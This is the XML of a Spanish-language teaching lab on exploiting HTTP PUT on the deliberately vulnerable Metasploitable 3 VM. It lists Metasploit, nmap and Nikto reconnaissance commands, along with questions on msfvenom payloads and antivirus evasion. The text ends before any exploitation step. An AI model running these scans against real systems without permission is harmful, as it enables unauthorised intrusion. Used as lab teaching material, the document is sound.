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922BC" w14:textId="22A749A4" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Práctica de Ciberseguridad: Explotación de HTTP PUT en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB47C56" w14:textId="14E9092E" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivos Generales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678CA2D6" w14:textId="140D667D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>Comprender el funcionamiento y la explotación del servicio HTTP PUT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6AF4F6" w14:textId="43BCA0B2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Aprender a usar herramientas clave en ciberseguridad como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Metasploit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,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Nmap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 y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Nikto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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0DE7F" w14:textId="62BA50D5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>Realizar un ataque controlado en un entorno seguro para entender las vulnerabilidades y sus mitigaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5872E337" w14:textId="7123A37E" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parte 1: Introducción y Configuración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B84DAA" w14:textId="7EB16F68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>Configuración del Entorno</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Asegúrate de tener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Metasploitable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 3 y Kali Linux (o herramientas equivalentes) listos para usar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A9530" w14:textId="3FE60A98" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parte 2: Herramientas y Conceptos Básicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4983FDC5" w14:textId="4DC6C1CD" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tarea 1: Uso de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="446C1BD6" w14:textId="0B76AB60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>Objetivo</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Aprender a utilizar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Metasploit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 para escaneo de puertos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB987A3" w14:textId="6B5C45A4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>Pasos</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56993575" w14:textId="2F6A0528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Inicia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Metasploit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 con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msfconsole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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E9D78F" w14:textId="3BCA1610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Utiliza el módulo de escaneo de puertos: </w:t>
      </w:r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use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auxiliary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/scanner/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portscan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/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tcp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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A9FF5C" w14:textId="0C75A86C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Configura el IP objetivo (RHOSTS) con la IP de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Metasploitable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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE2229E" w14:textId="0A51F9E9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Ejecuta </w:t>
      </w:r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run</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para iniciar el escaneo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88279D" w14:textId="02211BE6" w:rsidR="006C77E8" w:rsidRPr="006C77E8" w:rsidRDefault="006C77E8" w:rsidP="006C77E8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B380053" wp14:editId="32E20106">
            <wp:extent cx="4657725" cy="3590925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="327457863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57863" name="Imagen 1" descr="Pantalla de computadora con letras&#10;&#10;Descripción generada automáticamente con confianza media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9" t="9086" r="6935" b="7372"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="465772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B726D" w14:textId="55BAE341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>Preguntas</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352DEB10" w14:textId="3308C863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>¿Qué puertos están abiertos y qué servicios se identifican?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551F703" w14:textId="4C28CF02" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tarea 2: Escaneo con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DEA6174" w14:textId="47B7AE71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>Objetivo</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Utilizar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Nmap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 para el descubrimiento de servicios y puertos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A6F435" w14:textId="42646C45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lastRenderedPageBreak/>
        <w:t>Pasos</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A9166B" w14:textId="304A75AD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Ejecuta un escaneo básico con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nmap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 [IP de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Metasploitable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]</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134C30D7" w14:textId="5CE7530E" w:rsidR="00F30092" w:rsidRPr="00F30092" w:rsidRDefault="00F30092" w:rsidP="00F30092">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="316A1CB3" wp14:editId="6D228A06">
            <wp:extent cx="4600575" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1943301405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01405" name="Imagen 4" descr="Captura de pantalla de computador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8" t="33905" r="7434" b="14684"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="46005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B4B9B" w14:textId="72374FDB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Realiza un escaneo de servicios con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nmap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 -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sV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 [IP de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Metasploitable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]</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF5A522" w14:textId="0698E93F" w:rsidR="00F30092" w:rsidRPr="00F30092" w:rsidRDefault="00F30092" w:rsidP="00F30092">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3338D6ED" wp14:editId="15DA0481">
            <wp:extent cx="4629150" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="75351242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1242" name="Imagen 3" descr="Captura de pantalla de computador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3" t="20608" r="7101" b="15792"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="46291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072DE" w14:textId="503BBAD3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Intenta un escaneo agresivo con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nmap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 -A [IP de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Metasploitable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]</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A203C8" w14:textId="152E2EC8" w:rsidR="006C77E8" w:rsidRPr="006C77E8" w:rsidRDefault="006C77E8" w:rsidP="006C77E8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27C576E4" wp14:editId="647DFAC7">
            <wp:extent cx="4600575" cy="3219450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="310318734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18734" name="Imagen 2" descr="Texto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4" t="18171" r="7269" b="6929"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="460057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AC278" w14:textId="414D044D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>Preguntas</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB445AC" w14:textId="1D4972E7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>¿Cuál es la diferencia en los resultados entre los distintos tipos de escaneo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B29903" w14:textId="31E80AF3" w:rsidR="00682F5F" w:rsidRDefault="4FE345A3" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tarea 3: Investiga las siguientes herramientas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B555E9F" w14:textId="32A67180" w:rsidR="00682F5F" w:rsidRDefault="00682F5F" w:rsidP="56D8F479">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AA433E" w14:textId="59D4551E" w:rsidR="00682F5F" w:rsidRDefault="4FE345A3" w:rsidP="56D8F479">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Nikto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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0795C295" w14:textId="283583F0" w:rsidR="00682F5F" w:rsidRDefault="00682F5F" w:rsidP="56D8F479">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C918EC" w14:textId="2115B70D" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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b/>
          <w:bCs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¿Qué es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Nikto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 y para qué se utiliza?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E769775" w14:textId="3191A12C" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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Define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Nikto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 y explica su propósito principal en el ámbito de la seguridad informática.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38669E85" w14:textId="45DE52CE" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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b/>
          <w:bCs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¿Cómo realiza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Nikto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 el escaneo de vulnerabilidades en un servidor web?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016DE835" w14:textId="3492C4EA" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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Describe el proceso general de cómo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Nikto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 detecta vulnerabilidades y problemas de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2284D967" w14:textId="199C10C0" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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b/>
          <w:bCs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¿Cuáles son algunas de las características clave de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Nikto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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C7448D" w14:textId="0412F815" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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Identifica y explica al menos tres características destacadas de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Nikto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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F977B" w14:textId="08838C65" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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b/>
          <w:bCs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¿Por qué es importante usar herramientas como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Nikto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 en pruebas de penetración?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4DA322" w14:textId="6C66F226" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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>Reflexiona sobre la importancia de la detección de vulnerabilidades en la seguridad web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442FF839" w14:textId="259DE723" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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b/>
          <w:bCs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¿Cómo se interpretan los resultados proporcionados por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Nikto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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362054FD" w14:textId="375BF1E1" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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Explica cómo un profesional de la seguridad informática puede utilizar la información proporcionada por los resultados de un escaneo de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Nikto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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBF63EC" w14:textId="4D34C459" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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b/>
          <w:bCs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¿Cuáles son las limitaciones de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Nikto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 en el escaneo de vulnerabilidades?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657DCE0E" w14:textId="087381D0" w:rsidR="00682F5F" w:rsidRDefault="3A4B6134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Discute cualquier limitación o consideración que se debe tener en cuenta al utilizar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Nikto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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2FBE40" w14:textId="32193359" w:rsidR="00682F5F" w:rsidRDefault="00682F5F" w:rsidP="56D8F479">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEE1D02" w14:textId="116E87E0" w:rsidR="00682F5F" w:rsidRDefault="4FE345A3" w:rsidP="56D8F479">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Msfvenom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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F74DA" w14:textId="4CDE07A5" w:rsidR="00682F5F" w:rsidRDefault="706E7B8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b/>
          <w:bCs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¿Cómo se diferencia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msfvenom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 de otras herramientas de generación de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payloads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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FD567A" w14:textId="560244A7" w:rsidR="00682F5F" w:rsidRDefault="706E7B8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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Reflexiona sobre las características únicas de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msfvenom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 en comparación con otras herramientas similares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E46EE40" w14:textId="5A76E682" w:rsidR="00682F5F" w:rsidRDefault="706E7B8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b/>
          <w:bCs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Menciona tres tipos de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payloads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 que se pueden generar con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msfvenom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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119C16A9" w14:textId="6BE41CC2" w:rsidR="00682F5F" w:rsidRDefault="706E7B8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Identifica diferentes tipos de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payloads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 que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msfvenom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 puede crear y para qué sistemas operativos o aplicaciones están diseñados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B1DEC3" w14:textId="255C28C1" w:rsidR="00682F5F" w:rsidRDefault="706E7B8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b/>
          <w:bCs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¿Qué significa codificar un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payload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 en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msfvenom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 y por qué es importante?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F32C73E" w14:textId="59830A7F" w:rsidR="00682F5F" w:rsidRDefault="706E7B8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Describe el proceso de codificación de un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payload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 y su importancia en el contexto de la evasión de la detección de antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B274A" w14:textId="2CFB9DF2" w:rsidR="00682F5F" w:rsidRDefault="706E7B8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b/>
          <w:bCs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¿Cómo se integra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msfvenom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 con el resto del marco de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Metasploit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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF26B5F" w14:textId="61B2312D" w:rsidR="00682F5F" w:rsidRDefault="706E7B8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Explica cómo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msfvenom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 se complementa y se utiliza junto con otras herramientas y módulos en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Metasploit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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303B9407" w14:textId="193632BB" w:rsidR="00682F5F" w:rsidRDefault="00682F5F" w:rsidP="56D8F479">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC8C85F" w14:textId="6D107C51" w:rsidR="00682F5F" w:rsidRDefault="00682F5F" w:rsidP="56D8F479">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5826C84A" w14:textId="71050CE5" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parte 3: Explorando el Fallo HTTP PUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762521B9" w14:textId="6D994AD1" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tarea 3: Análisis con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12ADF919" w14:textId="583CDE91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>Objetivo</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Identificar posibles vulnerabilidades en el servidor web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77577D72" w14:textId="05248B19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>Pasos</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494CD615" w14:textId="1EB36D6E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Ejecuta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Nikto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 con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nikto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 -h [IP de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Metasploitable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]</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F5F2E7" w14:textId="0DE87205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>Preguntas</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0464B9C6" w14:textId="166C4FF9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>¿Qué vulnerabilidades específicas se reportan para el servicio HTTP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02F7DE" w14:textId="01F8C134" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parte 4: Preparación y Explotación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41720136" w14:textId="70D38AD0" w:rsidR="00682F5F" w:rsidRDefault="1FA4345D" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Determinación de Métodos HTTP Permitidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44819378" w14:textId="12475849" w:rsidR="00682F5F" w:rsidRDefault="1FA4345D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>Pasos</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448075A" w14:textId="391847B9" w:rsidR="00682F5F" w:rsidRDefault="1FA4345D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Utiliza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nmap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 --script http-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methods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 --script-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args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 http-methods.url-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path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='/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uploads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',http-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methods.test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-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all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 -p 8585 [IP de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Metasploitable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]</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
